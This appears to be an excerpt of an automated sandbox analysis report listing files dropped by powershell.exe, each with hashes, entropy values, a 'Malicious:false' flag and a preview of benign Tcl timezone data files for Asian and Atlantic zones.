                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Urumqi) {.. {-9223372036854775808 21020 0 LMT}.. {-1325483420 21600 0 +06}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2058
                                                                                                                                                                                                                              Entropy (8bit):3.773734429231407
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5petrlfgLv+OC+jsuwltZQONEa2Ggf3augO8UoxLyHdX/CX6bW4Bv/7NKxKG:5Ysv+0j6lua2Gg/3gO8UoOZU2Wc/pKF
                                                                                                                                                                                                                              MD5:5ADD78E4AFCBA913D078A8790861A2DE
                                                                                                                                                                                                                              SHA1:BB63A762D5D76C0FD3CB9AB2BCDE95718E1C99EB
                                                                                                                                                                                                                              SHA-256:9D639C0FC69B3BEEBC96969092F9590EB48E7946E901B225BF245E165973B9A8
                                                                                                                                                                                                                              SHA-512:7C2418FD1F96F101B83E2ABDF2551405C6E429DBBF30A2FA7CD2477E2CE1CEEBB790C51B28AEFF043BA7A7A914CEF3C812668058D69225B9FE9475C56508453D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ust-Nera) {.. {-9223372036854775808 34374 0 LMT}.. {-1579426374 28800 0 +08}.. {354898800 43200 0 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {764694000 43200 1 +12}.. {780418
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.858039387006872
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8VLYO5YFfXHAIgN8ELYOJARL/2WFKgTjEHp4WFKELt:SlSWB9vsM3y1LePHAIgKELtAN/2wKgsX
                                                                                                                                                                                                                              MD5:D23A09C84A5368FBB47174BC0A460D14
                                                                                                                                                                                                                              SHA1:045A72FEA79C75E5F0029BD110E33A022C57DFAB
                                                                                                                                                                                                                              SHA-256:18F5E4FE8247F676278AC5F1912AC401DC48DF5B756D22E76FF1CFA702F88DA7
                                                                                                                                                                                                                              SHA-512:404EABC2FC162E18C678CED063249C7FF4C28653880EA1903CE846FD191CD1C5B61E0610736F250B79BBAC768B1AFD6B9A8824D56D74591A95D7301B47D48387
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Bangkok)]} {.. LoadTimeZoneFile Asia/Bangkok..}..set TZData(:Asia/Vientiane) $TZData(:Asia/Bangkok)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2062
                                                                                                                                                                                                                              Entropy (8bit):3.7094518963173035
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:56beOUYQ7FyDy3le3i96VwAmnuBNuTw6vl9O8nfipRkwhUZDAcD:56cYQBIy343dVNUIukElcXRDhUBAcD
                                                                                                                                                                                                                              MD5:5C0C094B088D0212182E7B944197D4FE
                                                                                                                                                                                                                              SHA1:CF43A511FE9CD295207DF350704462E09D4D5278
                                                                                                                                                                                                                              SHA-256:2558C96E25359C72F168DAC6FB3C16C54F8FD7D0724EEB1671156D4A1F42AC6C
                                                                                                                                                                                                                              SHA-512:5D659EBDC8C2B06C964B083ECC78B4370A4658590D83F020CD23910C44E2D8DAFE69F61E8EB569E1905E89F38CD03ABE6B92F6CE36CF0B1EE0732A7645AFA65D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Vladivostok) {.. {-9223372036854775808 31651 0 LMT}.. {-1487321251 32400 0 +09}.. {-1247562000 36000 0 +11}.. {354895200 39600 1 +11}.. {370702800 36000 0 +10}.. {386431200 39600 1 +11}.. {402238800 36000 0 +10}.. {417967200 39600 1 +11}.. {433774800 36000 0 +10}.. {449589600 39600 1 +11}.. {465321600 36000 0 +10}.. {481046400 39600 1 +11}.. {496771200 36000 0 +10}.. {512496000 39600 1 +11}.. {528220800 36000 0 +10}.. {543945600 39600 1 +11}.. {559670400 36000 0 +10}.. {575395200 39600 1 +11}.. {591120000 36000 0 +10}.. {606844800 39600 1 +11}.. {622569600 36000 0 +10}.. {638294400 39600 1 +11}.. {654624000 36000 0 +10}.. {670348800 32400 0 +10}.. {670352400 36000 1 +10}.. {686077200 32400 0 +09}.. {695754000 36000 0 +11}.. {701798400 39600 1 +11}.. {717523200 36000 0 +10}.. {733248000 39600 1 +11}.. {748972800 36000 0 +10}.. {7
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2058
                                                                                                                                                                                                                              Entropy (8bit):3.7081033128260934
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5h+r1gIgWH/lt0irzEzCSCItWiIrW+rDQk9CVhyFY7rRWjYuhUmgr2j:K5PhtjLiII2ZFlgm
                                                                                                                                                                                                                              MD5:E43E5F0EA7C4575525BAB130984DCDCC
                                                                                                                                                                                                                              SHA1:2D715749469FEA51A8E25D1F4F8DC4FF9178817D
                                                                                                                                                                                                                              SHA-256:3BEF13638C46F16435D326C675907E61BB68C8173153CED3359E983BE0E413E5
                                                                                                                                                                                                                              SHA-512:27954FEC865031BC363CFDE94E97B3B19836A6F777646EA4AAB12ECCAEE6D60A0C690711EA192B917AC717F94A01D1EF64BAE97DF968069CC12415971B070498
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yakutsk) {.. {-9223372036854775808 31138 0 LMT}.. {-1579423138 28800 0 +08}.. {-1247558400 32400 0 +10}.. {354898800 36000 1 +10}.. {370706400 32400 0 +09}.. {386434800 36000 1 +10}.. {402242400 32400 0 +09}.. {417970800 36000 1 +10}.. {433778400 32400 0 +09}.. {449593200 36000 1 +10}.. {465325200 32400 0 +09}.. {481050000 36000 1 +10}.. {496774800 32400 0 +09}.. {512499600 36000 1 +10}.. {528224400 32400 0 +09}.. {543949200 36000 1 +10}.. {559674000 32400 0 +09}.. {575398800 36000 1 +10}.. {591123600 32400 0 +09}.. {606848400 36000 1 +10}.. {622573200 32400 0 +09}.. {638298000 36000 1 +10}.. {654627600 32400 0 +09}.. {670352400 28800 0 +09}.. {670356000 32400 1 +09}.. {686080800 28800 0 +08}.. {695757600 32400 0 +10}.. {701802000 36000 1 +10}.. {717526800 32400 0 +09}.. {733251600 36000 1 +10}.. {748976400 32400 0 +09}.. {76470
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):244
                                                                                                                                                                                                                              Entropy (8bit):4.692243303623333
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKs5XDm2OHGVQoHvZN6FCDx+UIFDVkvScHbY/s5UIAy:MB862KTmdHGuCvZNNkkHH3Sy
                                                                                                                                                                                                                              MD5:D45766D30074719C9A88ACE8BB53204B
                                                                                                                                                                                                                              SHA1:69B333DFCCCCEB66DD0F7DC28B272BB10769B6B0
                                                                                                                                                                                                                              SHA-256:2526557810747E78E713AE09BC305621A80FAEECF8D441632E7825738D4C79CB
                                                                                                                                                                                                                              SHA-512:5255DEED72D7D13862A4D6BED7E0458C099D2EF5A1B41536CAA7C0E65A61DE8B8D1AD62AD44559F970B6613ADFB3862778D1CC99B9A05CB5BBCA7F0202B5A5B2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yangon) {.. {-9223372036854775808 23087 0 LMT}.. {-2840163887 23087 0 RMT}.. {-1577946287 23400 0 +0630}.. {-873268200 32400 0 +09}.. {-778410000 23400 0 +0630}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2095
                                                                                                                                                                                                                              Entropy (8bit):3.704641905144701
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5ievNhYvm1qv7vXIovPvSvlDvtvuovKKvKcNvHvAvivBvqvvEyv8vlvEv+v4v+v+:/Nupj40H6l75FKCKcZP8qdyEaoBAWkW+
                                                                                                                                                                                                                              MD5:D4DABA407BB8A10E4961D1DE5D9781D1
                                                                                                                                                                                                                              SHA1:6933DE65336331BD90E2BEC6AEA0609B16DAEDC9
                                                                                                                                                                                                                              SHA-256:2C78699EFC60758B8F8D0D1DEEDFDED5E65C65EBF3082B23E60BDEA8BF8FBCFE
                                                                                                                                                                                                                              SHA-512:459E2187FAA66414F5CE934C335F563DFD2FA5316B86A54D1A29123A0460AFD65B7CE46629BD6A070A14CB6873A28A2F2803DE5FF4F29EA610712EB07FAD303F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yekaterinburg) {.. {-9223372036854775808 14553 0 LMT}.. {-1688270553 13505 0 PMT}.. {-1592610305 14400 0 +04}.. {-1247544000 18000 0 +06}.. {354913200 21600 1 +06}.. {370720800 18000 0 +05}.. {386449200 21600 1 +06}.. {402256800 18000 0 +05}.. {417985200 21600 1 +06}.. {433792800 18000 0 +05}.. {449607600 21600 1 +06}.. {465339600 18000 0 +05}.. {481064400 21600 1 +06}.. {496789200 18000 0 +05}.. {512514000 21600 1 +06}.. {528238800 18000 0 +05}.. {543963600 21600 1 +06}.. {559688400 18000 0 +05}.. {575413200 21600 1 +06}.. {591138000 18000 0 +05}.. {606862800 21600 1 +06}.. {622587600 18000 0 +05}.. {638312400 21600 1 +06}.. {654642000 18000 0 +05}.. {670366800 14400 0 +05}.. {670370400 18000 1 +05}.. {686095200 14400 0 +04}.. {695772000 18000 0 +06}.. {701816400 21600 1 +06}.. {717541200 18000 0 +05}.. {733266000 21600 1 +06}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2029
                                                                                                                                                                                                                              Entropy (8bit):3.6487650030366106
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5O4GeuadYlykbocXcwJUE5iu8JmFebARoc9lVNk7/9bq8dq16b3C9UPBUUUl2ue/:5xKdsUf8mFpNWFnyLCPYmPJSi3sh4
                                                                                                                                                                                                                              MD5:2CFA7C55D0731D24679CA5D5DC716381
                                                                                                                                                                                                                              SHA1:2BB66783D75C71E76409365757980FBC15F53231
                                                                                                                                                                                                                              SHA-256:20871FA6AA959DDFB73D846271B4A568627B564CFC08A11BDD84B98C2F2019A3
                                                                                                                                                                                                                              SHA-512:CAB10A48859B2C0B2CC7C56E0AA530AE7E506A4986BADC5ED974D124BD46DB328B50C423F83FCFD52D31962A249EEFC10351798B86D51EDA500F412C8D42E6BC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yerevan) {.. {-9223372036854775808 10680 0 LMT}.. {-1441162680 10800 0 +03}.. {-405140400 14400 0 +04}.. {354916800 18000 1 +04}.. {370724400 14400 0 +04}.. {386452800 18000 1 +04}.. {402260400 14400 0 +04}.. {417988800 18000 1 +04}.. {433796400 14400 0 +04}.. {449611200 18000 1 +04}.. {465343200 14400 0 +04}.. {481068000 18000 1 +04}.. {496792800 14400 0 +04}.. {512517600 18000 1 +04}.. {528242400 14400 0 +04}.. {543967200 18000 1 +04}.. {559692000 14400 0 +04}.. {575416800 18000 1 +04}.. {591141600 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 10800 0 +03}.. {670374000 14400 1 +03}.. {686098800 10800 0 +03}.. {701823600 14400 1 +03}.. {717548400 10800 0 +03}.. {733273200 14400 1 +03}.. {748998000 10800 0 +03}.. {764722800 14400 1 +03}.. {780447
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9879
                                                                                                                                                                                                                              Entropy (8bit):3.557602151081988
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:K35nZPOUYySoluItljncxelTMwtrayE6x5sETNek/CyNzybxYKmX6SXL/XbEcygI:K940pb6cL/b3Ldr9Q7TMq+ML
                                                                                                                                                                                                                              MD5:E7F2A3EE0362E9ED3ECBAD24168AD098
                                                                                                                                                                                                                              SHA1:98832274F6D9B641B809123D1272A1C04EEAA177
                                                                                                                                                                                                                              SHA-256:6B3609BE4E93D21A2AB492594EDD387931E2C787E8471C9F2D3A677F34002D8F
                                                                                                                                                                                                                              SHA-512:C48A76F8251AE455C759CB98802E40B3BEF716FD8E7441B6DE0242942C913367E3572B7C871082E97CA9BE67EC7DC37F8D01C438965217AC0EC36AD508DCE0D4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Azores) {.. {-9223372036854775808 -6160 0 LMT}.. {-2713904240 -6872 0 HMT}.. {-1830376800 -7200 0 -02}.. {-1689548400 -3600 1 -01}.. {-1677794400 -7200 0 -02}.. {-1667430000 -3600 1 -01}.. {-1647730800 -7200 0 -02}.. {-1635807600 -3600 1 -01}.. {-1616194800 -7200 0 -02}.. {-1604358000 -3600 1 -01}.. {-1584658800 -7200 0 -02}.. {-1572735600 -3600 1 -01}.. {-1553036400 -7200 0 -02}.. {-1541199600 -3600 1 -01}.. {-1521500400 -7200 0 -02}.. {-1442444400 -3600 1 -01}.. {-1426806000 -7200 0 -02}.. {-1379286000 -3600 1 -01}.. {-1364770800 -7200 0 -02}.. {-1348441200 -3600 1 -01}.. {-1333321200 -7200 0 -02}.. {-1316386800 -3600 1 -01}.. {-1301266800 -7200 0 -02}.. {-1284332400 -3600 1 -01}.. {-1269817200 -7200 0 -02}.. {-1221433200 -3600 1 -01}.. {-1206918000 -7200 0 -02}.. {-1191193200 -3600 1 -01}.. {-1175468400 -7200 0 -02}.. {-1127689
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8784
                                                                                                                                                                                                                              Entropy (8bit):3.833553120942514
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:ZRBHksL3zq6bCvyjvspNWMPm4bPJWXtRbALtuFW4ng2CEBJuQaeEy9P19OBYEi/+:ft0CC
                                                                                                                                                                                                                              MD5:B04E22B9B42722013941169B5D04DEA2
                                                                                                                                                                                                                              SHA1:32B96A7D9504D5022A6C4E2D310E95B5F062947F
                                                                                                                                                                                                                              SHA-256:099C3BEFBA3B4C00AE19BC53D475A52B32FAC9B36EC823C8EAEFC7D00F78F388
                                                                                                                                                                                                                              SHA-512:8B93BCA1E923B7A43F2EB0889216E8FF991D13CB8D25BD300310ED7CD8537DBD858E8F422C9B52AE2F52F7C1CB450EF0B7C5C1B3AE547C9C1E18E2A851569DD5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Bermuda) {.. {-9223372036854775808 -15558 0 LMT}.. {-2524506042 -15558 0 BMT}.. {-1664307642 -11958 1 BMT}.. {-1648932042 -15558 0 BMT}.. {-1632080442 -11958 1 BMT}.. {-1618692042 -15558 0 BST}.. {-1262281242 -14400 0 AT}.. {-882727200 -10800 1 ADT}.. {-858538800 -14400 0 AST}.. {-845229600 -10800 1 ADT}.. {-825879600 -14400 0 AST}.. {-814384800 -10800 1 ADT}.. {-793825200 -14400 0 AST}.. {-782935200 -10800 1 ADT}.. {-762375600 -14400 0 AST}.. {-713988000 -10800 1 ADT}.. {-703710000 -14400 0 AST}.. {-681933600 -10800 1 ADT}.. {-672865200 -14400 0 AST}.. {-650484000 -10800 1 ADT}.. {-641415600 -14400 0 AST}.. {-618429600 -10800 1 ADT}.. {-609966000 -14400 0 AST}.. {-586980000 -10800 1 ADT}.. {-578516400 -14400 0 AST}.. {-555530400 -10800 1 ADT}.. {-546462000 -14400 0 AST}.. {-429127200 -10800 1 ADT}.. {-415825200 -14400 0 AST}.. {1
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6856
                                                                                                                                                                                                                              Entropy (8bit):3.8064107143060752
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:KXVuHfXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:KXVQbkIaFF1w0us4qE3+sSGjT
                                                                                                                                                                                                                              MD5:8ABD279386C50705C074EEE18BF5AE59
                                                                                                                                                                                                                              SHA1:C392231DBE744F5942DA4BFAC8AD0ABEBAEA0BF3
                                                                                                                                                                                                                              SHA-256:2026944DCDEBC52F64405E35119F4CF97EA9AA1E769498730880B03F29A2B885
                                                                                                                                                                                                                              SHA-512:3095759D01AC7EEA25E427CA38E8A0395BEFA7250E7A0C1327BF9D61F07F4570CDF7313FBE6695973EB0DD66D201C6C63591CC0DA8A1E0029926DC7056F4C95B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Canary) {.. {-9223372036854775808 -3696 0 LMT}.. {-1509663504 -3600 0 -01}.. {-733874400 0 0 WET}.. {323827200 3600 1 WEST}.. {338950800 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}.. {749005200 0 0 WET}.. {764730000 3600 1 WEST}.. {780454800 0 0 WET}.. {796179600
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):246
                                                                                                                                                                                                                              Entropy (8bit):4.637993677747699
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2RQ7RfDm2OHDoH1JlvQV/FFrR3FcykVvQV/FFf+nmwV:MB86267RLmdHDC1w/FH3FcyL/FomwV
                                                                                                                                                                                                                              MD5:1581C6470850E0C9DB204975488B1AF8
                                                                                                                                                                                                                              SHA1:6933ED13F18AD785CEDF0837F86EFAC671297A85
                                                                                                                                                                                                                              SHA-256:2EA59ACDB5BBDD3C6ABCEEA456838A5CA57371A3D2BB93604B37F998ED8B9D4D
                                                                                                                                                                                                                              SHA-512:9FFFA013D82CEFF6F447521C19270ECDD71152F23670164423E6013FEC46253C62D2CB79B42630BD786BD113F27369E746CA981DD17E789F7571F473B47247C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Cape_Verde) {.. {-9223372036854775808 -5644 0 LMT}.. {-1830376800 -7200 0 -02}.. {-862610400 -3600 1 -01}.. {-764118000 -7200 0 -02}.. {186120000 -3600 0 -01}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.709193799640151
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqLG4E23vXHAIgvMG4EeRRL/2RQqG4EZrB/4RQqG4E1n:SlSWB9vsM3yCPHAIgvoRN/2RQ1rB/4Ri
                                                                                                                                                                                                                              MD5:601EB889A87F9CAD6F1DF4D1AB009FAE
                                                                                                                                                                                                                              SHA1:EB43C253A48755442A67A2408D7E3295549F831C
                                                                                                                                                                                                                              SHA-256:64FB8CAD17CD36666C7027AAD01344FEF659B13699EEF1942365842F8ED2170E
                                                                                                                                                                                                                              SHA-512:9CFC4A446ED6A3BEF6C26AE57324F10A970EE2ADD6933130447FAD6A3DB538841F2490DD461AF5776FACD9BD2CDC4A83247DFA6B34802AE844DDC6D4C37B28EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Atlantic/Faroe)]} {.. LoadTimeZoneFile Atlantic/Faroe..}..set TZData(:Atlantic/Faeroe) $TZData(:Atlantic/Faroe)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6796
                                                                                                                                                                                                                              Entropy (8bit):3.804838552487436
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:96ufXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:/bkIaFF1w0us4qE3+sSGjT
                                                                                                                                                                                                                              MD5:F97CC7EB9C52D00177BFF4715832FCD5
                                                                                                                                                                                                                              SHA1:CD9DCBB5E6ADD6EA91C8F142957EC229FC7F6DA3
                                                                                                                                                                                                                              SHA-256:795F438E7F01342D5F25ECCDD09FCE65C03C5D2D561B9B5191301D57EC16B850
                                                                                                                                                                                                                              SHA-512:9586289FEB6C597160011A47432F0AC40000483FA2E579BD89046EFD33E98DDAD652B792FD80CEDEB4CD87B6439A7B473F25F1B7375BC75353CBAF9F77E1084E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Faroe) {.. {-9223372036854775808 -1624 0 LMT}.. {-1955748776 0 0 WET}.. {347155200 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}.. {749005200 0 0 WET}.. {764730000 3600 1 WEST}.. {780454800 0 0 WET}.. {796179600 3600 1 WEST}.. {811904400 0 0 WET}.. {828234000 3600
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.957633978425468
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/2RQqG0EHEcAg/h8QahV:SlSWB9vsM3ymhVoPHAIgoh6N/2RQaK85
                                                                                                                                                                                                                              MD5:95C2D55CCE5809089CDB041EA3D464F8
                                                                                                                                                                                                                              SHA1:B395F5F26CE979BDF2B9E2CB51C06929AED11A6C
                                                                                                                                                                                                                              SHA-256:11BF0746F95BA01807D3B34C8FAE3FF4AE9DB5E4E6BC0CB8B36906CC3F44EDE5
                                                                                                                                                                                                                              SHA-512:AB2BE22E95A7C36E18EBA1BB63B3930A523ED793E43A3F597A8F63AE2F0E44436C39144BC136E7E5716D7FCBFAE7F1FAF36BCFFCF9C8D51151FF25BB14D6F8B5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Atlantic/Jan_Mayen) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9709
                                                                                                                                                                                                                              Entropy (8bit):3.80455694200614
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:hZUiLbMsf/ss0qKd+aKyUXtOZHY1SCOcesoQivoKbFVCdm1rXWNXyCXTOuUbkIaq:hZZDQX1rWJysukysLE3+sSGjT
                                                                                                                                                                                                                              MD5:AC6647F9B53B5958214EC3F3B78A4D85
                                                                                                                                                                                                                              SHA1:7355622AF99296F069F73899D5C70941C207F676
                                                                                                                                                                                                                              SHA-256:B2A0D0DDC26806A05B2BE806CA3F938DB12A3FA40110B8B21FD3F04EFED3A531
                                                                                                                                                                                                                              SHA-512:07569CA4D5DC6D57D91D6FDC370671A7546B73BA653D094E1B501D33570F7700727AD7FF2A083BC79E9EDE807C47E7A5604BEF5803F290B2F277C51DEF10FA6B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Madeira) {.. {-9223372036854775808 -4056 0 LMT}.. {-2713906344 -4056 0 FMT}.. {-1830380400 -3600 0 -01}.. {-1689552000 0 1 +00}.. {-1677798000 -3600 0 -01}.. {-1667433600 0 1 +00}.. {-1647734400 -3600 0 -01}.. {-1635811200 0 1 +00}.. {-1616198400 -3600 0 -01}.. {-1604361600 0 1 +00}.. {-1584662400 -3600 0 -01}.. {-1572739200 0 1 +00}.. {-1553040000 -3600 0 -01}.. {-1541203200 0 1 +00}.. {-1521504000 -3600 0 -01}.. {-1442448000 0 1 +00}.. {-1426809600 -3600 0 -01}.. {-1379289600 0 1 +00}.. {-1364774400 -3600 0 -01}.. {-1348444800 0 1 +00}.. {-1333324800 -3600 0 -01}.. {-1316390400 0 1 +00}.. {-1301270400 -3600 0 -01}.. {-1284336000 0 1 +00}.. {-1269820800 -3600 0 -01}.. {-1221436800 0 1 +00}.. {-1206921600 -3600 0 -01}.. {-1191196800 0 1 +00}.. {-1175472000 -3600 0 -01}.. {-1127692800 0 1 +00}.. {-1111968000 -3600 0 -01}.. {-
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
